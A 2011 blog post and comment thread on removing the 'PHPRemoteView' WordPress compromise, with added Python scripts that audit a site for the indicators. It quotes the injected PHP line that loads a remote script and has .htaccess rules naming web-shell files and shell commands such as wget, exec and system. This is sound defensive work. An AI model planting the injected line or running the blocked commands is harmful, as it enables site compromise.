PHPRemoteView Hack: What it is, and how to remove it

Aug 7, 2011 by

What is the PHPRemoteView hack? The PHPRemoteView hack is a WordPress compromise that begins with the attackers gaining write access to your WordPress directory. I did not take a screenshot of it myself, but I was dumb enough to fall for it. When you opened the WordPress administration directory, it showed an alert that looked like an HTTP authentication prompt; entering your username and password then displayed a message linking to a page in another language.

Normally, I do not fall for hacks, but I fell for this and I was pretty disappointed.

I learned that this hack was caused by a security vulnerability in timthumb.php (a thumbnail fetching script), and I was susceptible because I had not updated my timthumb.php.

I scoured the Internet and finally found a fix.

First, in your WordPress’s index.php, remove the following script added by the hack:

echo '<script type="text/javascript" language="javascript" src="'.urlencode($_SERVER['HTTP_REFERER']) .'"></script>';

(Note that the script could also be run from

Then remove six (check back often) phony files added by the hackers (back up first, in case your installation actually requires these files):


Do not try to open any of these files, as my antivirus sounded alarms immediately.

I learned my lesson, and upon purging TechSpheria of this hack, I changed about twenty passwords.

To increase your site’s security, make sure you have correct permissions for files and directories.

Folder permissions for all of my WordPress installations are 755 whereas file permissions are 644.

Run these commands to set those permissions recursively for your WordPress installation (directories to 755, files to 644):

find /wordpressdirectory -type d -exec chmod 0755 {} +
find /wordpressdirectory -type f -exec chmod 0644 {} +
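As an added example (not code from the original post), here is a small Python audit that checks a WordPress tree for the three things described above: the referrer-based script echo in PHP files, the phony file names reported in this post and its comments (udp.php or upd.php, feed-file.php, feed-files.php, a 32-hex-digit .php name, and a temp directory inside a theme), and entries whose permissions are not 0755 for directories and 0644 for files. The sample tree built by build_sample_tree() is constructed for the demonstration; its contents and the "mytheme" directory are placeholders.

```python
"""Audit a WordPress tree for the indicators described in the post (added example)."""
import os
import re
import stat
import tempfile

# The echo the hack inserts into index.php loads a remote script whose URL
# carries urlencode($_SERVER['HTTP_REFERER']); we look for that combination.
INJECT_RE = re.compile(r"<script[^>]*urlencode\(\$_SERVER\['HTTP_REFERER'\]\)")

# File names reported in the post and its comments (udp.php / upd.php,
# feed-file(s).php, a 32-hex-digit .php dropped into wp-content).
DROPPED_NAME_RES = [
    re.compile(r"^(udp|upd)\.php$", re.I),
    re.compile(r"^feed-files?\.php$", re.I),
    re.compile(r"^[0-9a-f]{32}\.php$", re.I),
]

DIR_MODE, FILE_MODE = 0o755, 0o644


def _walk(root):
    """Yield (relative path, stat) for every entry below root, symlinks excluded."""
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if stat.S_ISLNK(st.st_mode):
                continue
            yield os.path.relpath(full, root).replace(os.sep, "/"), st


def find_injected_scripts(root):
    """PHP files containing the referrer-based <script> echo."""
    hits = []
    for rel, st in _walk(root):
        if stat.S_ISREG(st.st_mode) and rel.lower().endswith(".php"):
            with open(os.path.join(root, rel), "r", errors="replace") as fh:
                if INJECT_RE.search(fh.read()):
                    hits.append(rel)
    return sorted(hits)


def find_dropped_files(root):
    """Files matching the phony names, plus any 'temp' directory inside a theme."""
    hits = []
    for rel, st in _walk(root):
        name = rel.rsplit("/", 1)[-1]
        if stat.S_ISREG(st.st_mode) and any(r.match(name) for r in DROPPED_NAME_RES):
            hits.append(rel)
        elif stat.S_ISDIR(st.st_mode) and re.match(r"^wp-content/themes/[^/]+/temp$", rel):
            hits.append(rel + "/")
    return sorted(hits)


def find_bad_permissions(root):
    """Entries whose mode differs from 0755 (directories) or 0644 (files)."""
    bad = []
    for rel, st in _walk(root):
        mode = stat.S_IMODE(st.st_mode)
        expected = DIR_MODE if stat.S_ISDIR(st.st_mode) else FILE_MODE
        if mode != expected:
            bad.append((rel, oct(mode)))
    return sorted(bad)


def audit(root):
    """Run all three checks and return their results keyed by check name."""
    return {
        "injected": find_injected_scripts(root),
        "dropped": find_dropped_files(root),
        "bad_perms": find_bad_permissions(root),
    }


def build_sample_tree():
    """Constructed WordPress-like tree with the indicators planted (demo only)."""
    root = tempfile.mkdtemp(prefix="wp-audit-")
    files = {
        "index.php": "<?php\necho '<script type=\"text/javascript\" src=\"'"
                     ".urlencode($_SERVER['HTTP_REFERER']).'\"></script>';\n"
                     "require('./wp-blog-header.php');\n",
        "wp-admin/udp.php": "<?php /* phony */\n",
        "wp-content/uploads/feed-files.php": "<?php /* phony */\n",
        "wp-content/78d69f40906679a976dc4d45cebffbe6.php": "<?php /* phony */\n",
        "wp-content/themes/mytheme/temp/index.php": "<?php /* phony */\n",
        "wp-content/themes/mytheme/style.css": "/* legit */\n",
        "wp-config.php": "<?php /* legit */\n",
    }
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(body)
    for rel, st in list(_walk(root)):
        os.chmod(os.path.join(root, rel), DIR_MODE if stat.S_ISDIR(st.st_mode) else FILE_MODE)
    os.chmod(os.path.join(root, "wp-config.php"), 0o666)  # planted world-writable file
    return root


if __name__ == "__main__":
    for key, val in audit(build_sample_tree()).items():
        print(key, val)
```

Run it against a real installation with audit('/path/to/wordpress'). The injected-echo check reads every .php file, so it takes a moment on a large tree, and a permission hit is only a hint: some hosts run PHP under a different user and document other modes, so compare against what your host recommends before changing anything.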

I also added this rule in my .htaccess (in my account’s root folder, not inside public_html):

order allow,deny
deny from 91.220
deny from 91.196
deny from
deny from
allow from all

The malicious script was run from (UPDATE: has popped up). I ran a traceroute on the domains and found their servers’ IP addresses. To be safe, I blocked all the IPs in their ranges (91.220 and 91.196), so they receive a forbidden notice if they try to access TechSpheria again.

Benoist Rousseau posted additional .htaccess security; use at your own risk:

RewriteCond %{REQUEST_URI} .*((php|my)?shell|remview.*|phpremoteview.*|sshphp.*|pcom|nstview.*|c99|r57|webadmin.*|phpget.*|phpwriter.*|fileditor.*|locus7.*|storm7.*)\.(p?s?x?htm?l?|txt|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?|sql|xml) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)=/home/(.*)$ [OR]
RewriteCond %{QUERY_STRING} ^work_dir=.*$ [OR]
RewriteCond %{QUERY_STRING} ^command=.*&output.*$ [OR]
RewriteCond %{QUERY_STRING} ^nts_[a-z0-9_]{0,10}=.*$ [OR]
RewriteCond %{QUERY_STRING} ^c=(t|setup|codes)$ [OR]
RewriteCond %{QUERY_STRING} ^act=((about|cmd|selfremove|chbd|trojan|backc|massbrowsersploit|exploits|grablogins|upload.*)|((chmod|f)&f=.*))$ [OR]
RewriteCond %{QUERY_STRING} ^act=(ls|search|fsbuff|encoder|tools|processes|ftpquickbrute|security|sql|eval|update|feedback|cmd|gofile|mkfile)&d=.*$ [OR]
RewriteCond %{QUERY_STRING} ^&?c=(l?v?i?&d=|v&fnot=|setup&ref=|l&r=|d&d=|tree&d|t&d=|e&d=|i&d=|codes|md5crack).*$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)([-_a-z]{1,15})=(ls|cd|cat|rm|mv|vim|chmod|chdir|mkdir|rmdir|pwd|clear|whoami|uname|tar|zip|unzip|tar|gzip|gunzip|grep|more|ln|umask|telnet|ssh|ftp|head|tail|which|mkmode|touch|logname|edit_file|search_text|find_text|php_eval|download_file|ftp_file_down|ftp_file_up|ftp_brute|mail_file|mysql|mysql_dump|db_query)([^a-zA-Z0-9].+)*$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)(wget|shell_exec|passthru|system|exec|popen|proc_open)(.*)$
RewriteRule (.*) - [F]
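To see what those conditions actually catch before enabling them, here is an added Python example (not Benoist Rousseau's rules or code from the original post) that ports the REQUEST_URI and QUERY_STRING patterns above to Python regular expressions and runs them over a few constructed Apache access-log lines. It reports which rule would have fired for each request, which is also a quick way to check existing logs for probes; the last sample line shows a false positive the final pattern produces on an ordinary query string.

```python
"""Replay the .htaccess conditions above against access-log lines (added example)."""
import re
from urllib.parse import urlsplit

# REQUEST_URI condition; it carries [NC], so it is compiled case-insensitive.
URI_RE = re.compile(
    r".*((php|my)?shell|remview.*|phpremoteview.*|sshphp.*|pcom|nstview.*|c99|r57|"
    r"webadmin.*|phpget.*|phpwriter.*|fileditor.*|locus7.*|storm7.*)"
    r"\.(p?s?x?htm?l?|txt|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?|sql|xml)",
    re.I,
)

# QUERY_STRING conditions, in the order they appear in the snippet (case-sensitive).
QUERY_RES = [re.compile(p) for p in (
    r"^(.*)=/home/(.*)$",
    r"^work_dir=.*$",
    r"^command=.*&output.*$",
    r"^nts_[a-z0-9_]{0,10}=.*$",
    r"^c=(t|setup|codes)$",
    r"^act=((about|cmd|selfremove|chbd|trojan|backc|massbrowsersploit|exploits|"
    r"grablogins|upload.*)|((chmod|f)&f=.*))$",
    r"^act=(ls|search|fsbuff|encoder|tools|processes|ftpquickbrute|security|sql|eval|"
    r"update|feedback|cmd|gofile|mkfile)&d=.*$",
    r"^&?c=(l?v?i?&d=|v&fnot=|setup&ref=|l&r=|d&d=|tree&d|t&d=|e&d=|i&d=|codes|md5crack).*$",
    r"^(.*)([-_a-z]{1,15})=(ls|cd|cat|rm|mv|vim|chmod|chdir|mkdir|rmdir|pwd|clear|whoami|"
    r"uname|tar|zip|unzip|tar|gzip|gunzip|grep|more|ln|umask|telnet|ssh|ftp|head|tail|which|"
    r"mkmode|touch|logname|edit_file|search_text|find_text|php_eval|download_file|"
    r"ftp_file_down|ftp_file_up|ftp_brute|mail_file|mysql|mysql_dump|db_query)"
    r"([^a-zA-Z0-9].+)*$",
    r"^(.*)(wget|shell_exec|passthru|system|exec|popen|proc_open)(.*)$",
)]

# Minimal parser for Apache combined log format: client IP, timestamp, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3})'
)

# Constructed access-log lines for the demonstration (addresses from documentation ranges).
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Aug/2011:03:12:44 +0000] "GET /wp-content/udp.php?act=cmd&d=/home/site HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [07/Aug/2011:03:12:51 +0000] "GET /wp-content/themes/x/c99.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [07/Aug/2011:08:41:02 +0000] "GET /?s=wordpress+security HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [07/Aug/2011:08:41:30 +0000] "GET /index.php?cmd=ls%20-la HTTP/1.1" 200 120 "-" "curl/7.21"',
    '192.0.2.9 - - [07/Aug/2011:09:00:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [07/Aug/2011:09:00:15 +0000] "GET /?page=executive-team HTTP/1.1" 200 4410 "-" "Mozilla/5.0"',
]


def classify(target):
    """Return the name of the first condition the request target satisfies, or None."""
    parts = urlsplit(target)
    # mod_rewrite matches with search semantics, so re.search rather than re.match.
    if URI_RE.search(parts.path):
        return "uri"
    for i, rx in enumerate(QUERY_RES, 1):
        if rx.search(parts.query):
            return "query%d" % i
    return None


def scan_log(lines):
    """Return (line number, client IP, target, rule) for every request the rules would block."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        rule = classify(m.group("target"))
        if rule:
            hits.append((n, m.group("ip"), m.group("target"), rule))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("line %d  %-13s %-45s %s" % hit)
```

Only the REQUEST_URI condition carries [NC], so only that one is compiled with re.I; the query-string patterns are case-sensitive as written. The last sample line illustrates why the post says to use the rules at your own risk: page=executive-team is blocked because the final pattern matches exec anywhere in the query string, so run a scan like this over a day of normal traffic before deploying the rules.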

Remember to keep your plugins and code updated, and use different passwords for all your sites; keeping a secure WordPress installation is vital to everything.

(via T. Bogard and Benoist Rousseau)

Added /wp-content/udp.php to the list of malicious files.

/wp-content/udp.php can also be located in /wp-admin/udp.php. Check both /wp-content/ and /wp-admin/ for udp.php.

Both /wp-content/udp.php and /wp-admin/udp.php are present and malicious. Remove them both.

Added two files: /wp-content/uploads/feed-file.php and /wp-content/uploads/feed-files.php to the list.

Added 91.196 to the deny IP list since has popped up.

  • bill ballad

    I had the same thing hit my site yesterday. You may have missed a file: look for udp.php in wp-content, it’s a remote file upload script

    • Dennis Fan

      Yes, thanks. I was unaware of its presence.

      And I was hit by it yesterday as well, only got around to writing about it today.

    • Dennis Fan

      Do you know if they collect usernames and passwords sent through their script?

      • debajyoti banerjee

        Better to change your MySQL database password and all other associated passwords. I have faced a similar phpRemoteView attack while using the “IGIT related post with thumb image after post” plugin, which uses an old ‘timthumb.php’ file vulnerable to this attack.

        • Dennis Fan

          Thank you. I already changed most of my significant passwords.

        • Andrew Wells Douglass

          I’m thinking IGIT is the culprit, too. Sent a note to the author. Version 3.9.7

          Any suggestions for alternative plugins? :)

      • bill ballad

        Looks like this was just phase one; right now I think they are just collecting attack metrics. Phase two will bring exploit packages if you didn’t clean your site. I think phase one was an automated worm.

        • Dennis Fan

          Thank you for sharing your thoughts. Mind if I include that in the article later? (with credit, of course)

  • Pingback: Ci hanno infettato il sito! | La Baia

  • Pingback: Wordpress Website Hacked with RemoteViewPHP

  • dirk_s

    udp.php is also changed / added in /wp-admin/

    • Dennis Fan

      Thank you for that information. I will update the post now.

  • dirk_s

    Quadro is a theme, that uses the timthumb.php …

  • Pingback: How to Check for PHP Remote View Hack | Empirical Integrated Marketing

  • Paul

    Thank you so much for the comprehensive fix. Do we need to remove timthumb.php? Is there an update available?

    • Dennis Fan

      Yes, there is an update available, no need to remove it.

      Sent from my HTC


  • Tina

    You’ve saved my life – thank you so much!

  • Steve519

    There were also two files that were uploaded to the upload folder. I forgot the names but they had either feed or rss in the title. Both within an hour of the other files being uploaded.

    • Dennis Fan

      /wp-content/feed-file.php and /wp-content/feed-files.php. Thank you. Added to the list, much appreciated!

  • Beau Brooke

    I believe my site is infected by this too. I’ve checked my index.php but I dont have the script above. I did however have some of the additional malicious files. Where should I be looking?

    I have updated my timthumb.php and removed what I can but I need to make sure it’s 100% removed.

  • Beau Brooke

    Ignore me, I assumed this guide meant the index.php within the theme folder. I’ve found it now.

  • Tina

    I just found yet another file wp-content/78d69f40906679a976dc4d45cebffbe6.php

  • Pingback: Removing PHPRemoteView hack attack from your Wordpress

  • Nayith

    Question! I Had wp-admin/upd.php instead of udp.php I delete it, was this incorrect?

    • Dennis Fan

      I’m sorry, I’m not understanding what you’re saying.

      Sent from my HTC


      • Nayith

        In my directory, I was not able to find (as mentioned above)



        Instead, they were called /wp-admin/UPD.php (the difference is just the letter order). Do you think it will affect my website?

        • Dennis Fan

          Check the contents of the file. I doubt its legitimacy, however, make sure. If there are no comments indicating WordPress or a plugin, it’s probably malicious.

          • Nayith

            Thanks A lot for your help, really appreciated!!

          • Nayith

            As you said, they are illegitimate!

  • Admin

    there’s also a temp directory inside your theme template; delete that as well

  • KillerSneak

    Sorry for the double post, the temp directory also hosts an altered .htaccess and the 78d69f40906679a976dc4d45cebffbe6.php numeric php files along with some fake index and other files. Just delete the whole temp directory/folder

  • rachelhonoway

    Thanks for the help – MUCH appreciated! (BTW – We use the magnificent theme as well)

  • Owen Christopher Wolter

    THANKS so much for this. became infected, I don’t know when the last time was that I updated timthumb

    Also, a recent ping of returns 91.196.XXX.XXX

    So in my htaccess I now have:

    order allow,deny
    deny from 91.220
    deny from 91.196
    deny from
    allow from all

  • carley

    Another big thank you for the post! Damn hackers!

  • Zack Proser

    Much appreciated!

  • Pingback: phpRemoteView Attack: Vulnerabilità in WordPress

  • Matt C

    Awesome post. Just saved my ass. Thank you.

  • Adamfrm

    thank you very much for this useful article. I have also received such a problem and I’ve run the appropriate command from the article above, but I do not find the files /wp-content/uploads/feed-file.php and /wp-content/uploads/feed-files.php. Can you help me?

    • Dennis Fan

      If those files are not there, you SHOULD be fine.

    • Anonymous

      I had the same issue with this hack, but thanks to this post I saved my websites. Adamfrm, I couldn’t find /feed-files.php and /feed-file.php either, but when I checked my sites on it didn’t show me that the sites were infected, because before that I had checked them and it had shown me that my sites had been infected.

  • Nwill36

    Very useful information, 1 of my sites had been hacked, also got through crawltrack,
    Thanks for your quick help I have secured other sites using wordpress

  • LloydChiro

    Thanks for this. I had SOME of those files in my site, but not all. 

    I’m wondering if I need to wipe my site on my host and start clean, or will this be a permanent fix?

    • Dennis Fan

      You SHOULD be fine.

      Sent from my HTC


  • LloydChiro

    Oh, and I can’t figure out how I got this. Anybody know how this shows up?

    • Dennis Fan

      timthumb.php had a security exploit and that was used to infect your site.
      Sent from my HTC


      • LloydChiro

        Thanks. I actually just updated my timthumb.php file. The theme that I’m using is using version 1.4, and the latest version is up to 2.7. I would have never thought to update this on my own, as it’s not a plugin that I see on my dashboard.

  • Chris Miller

    Thanks for your help with this! Saved a site for us tonight! 

  • Andrew Wells Douglass

    I should have also said THANK YOU THANK YOU THANK YOU for a timely and lucid explanation of this problem. I suspect others are more grateful than it might seem. It’s like, if your doctor tells you that you have cancer, your first instinct may not be to send her a fruit basket….

  • Pre_existance

    THANK YOU SO MUCH FOR THIS….i’ve spent all day trying to figure this out and wasn’t understanding anything i was reading on other sites. This made perfect sense and actually WORKED!!! hoorah!!

  • Pingback: Seu wordpress pode estar sendo hackeado pelo Superuperdomain: TimThumb e PHP Remote View Hack | [ Ferramentas Blog ]

  • Pingback: eBabble - Technology » TimThumb Vulnerability

  • Lauro Faria

    Apart from these files, I also found /wp-content/e334….php, /wp-config.php and /index.php, which had injected code. Lauro

  • OceansDB

    My blog got hacked too. I filed a complaint at’s registrar with some additional information and a virus report. I am very pleased to let y’all know the domain has been suspended :)

  • Pingback: Falha de segurança no Timthumb - BDI BBS

  • Seb

    thanks for this great post. I got hacked by this crap as well. I deleted the files you mentioned above but I can’t find “the base code”.

    “First, in your WordPress’s index.php, remove the following script added by the hack: echo ”;” I can’t find this on my index.php. Do you have another idea? Regards

    • Dennis Fan

      Does your index.php look like a normal WordPress index?

      • Seb

        That is how it looks like

        But if I check the sourcecode at I can see the script.

        • Dennis Fan

          Clear any caching plugin you might have installed.

          • Seb

            Don’t have a caching plugin installed :-/

            • Dennis Fan

              Oh… Check the blog header file then? Maybe the hackers have evolved…

              • Seb

                Thanks a bunch for your quick answers, Dennis. I searched index.php, header and footer for “superpuperdomain” but I can’t find anything. It’s weird.

                • Dennis Fan

                  Try clearing your cache?

                  • Seb

                    Done. Still in the sourcecode. 


                • Dennis Fan

                  *Your browser cache.

        • Dennis Fan

          Hello, I just checked your site’s source and did not manage to find superpuperdomain…

          • Seb

            Chrome shows it and a huge malware warning pops up if you try to reach the site :-/

            • Dennis Fan

              I have no idea what could be causing this, I suggest you wait for a day, and see if it is still there. If so, there are more extreme ways of fixing this.

  • Pingback: Malware Attacke | FOTOPRESSO

  • Beej

    I have the same thing as site’s source code: has this on line 669. I don’t know how to change it.

    • beej


      • Robbie

        how did you fix it?

  • Pingback: Webseite gehackt. Kontrolliert eure Wordpress Installation. : swblog

  • Pixel2Pixel Design

    Refer this article it is a good one to remove this virus

  • Blaise

    thanks. Really. You save my blog

  • Gautam

    I’ve removed the code from wp-config.php and also deleted the upd.php file from wp-content. But still, when I browse any site, it seems to crash the whole server. I have 4 WP sites running under 3 users on a Dreamhost VPS – I’ve cleaned them all against codes, timthumb (it is there on one site, but that is the latest version with allow external deactivated), files etc. and also added the htaccess codes (both of those in the same file, above the domain directory).

  • KillerSneak

    Anybody having issues with “” my site has been flagged by Chrome now and it leads to the same:
    Welcome to nginx! that the timthumb hack had? Can someone help me as I can’t find where it’s coming from

  • Pingback: Hacked And Had | Micah

  • JustMe

    I cleared one of my site’s from this hack, but now my other site got hacked too. Not by but….

    It seems to be a lot more difficult to resolve :-(

    Anyone else got probs with downloading plugins through the backend? Like, get redirected to google, or the malware message from google?
    Could you please check this out techspheria? Maybe you will find a solution, before all the wordpress installations got this issue….

  • JustMe

    Found it, my .htaccess file had a few hidden lines that linked to http:*//distributioncorporate*.ru/kloac/index.php
    Deleted my .htaccess file and made a new one. These hackers also place phony files in your wordpress installation. Check your uploads directory and theme files for sm3.php and other files you don’t recognize.

  • Pingback: Drabbad av Pharma Hack… @ Who Cut The Cheeze

  • Deirdorf

    Thanks for the help!!! 

    I would have found this post sooner if it had shown up in initial search for “Exploit:JS/Timbum.B” 

    It would help if you added Exploit:JS/Timbum.B since that is how the malware is referenced.

  • Justin Wheeler

    Thanks very much!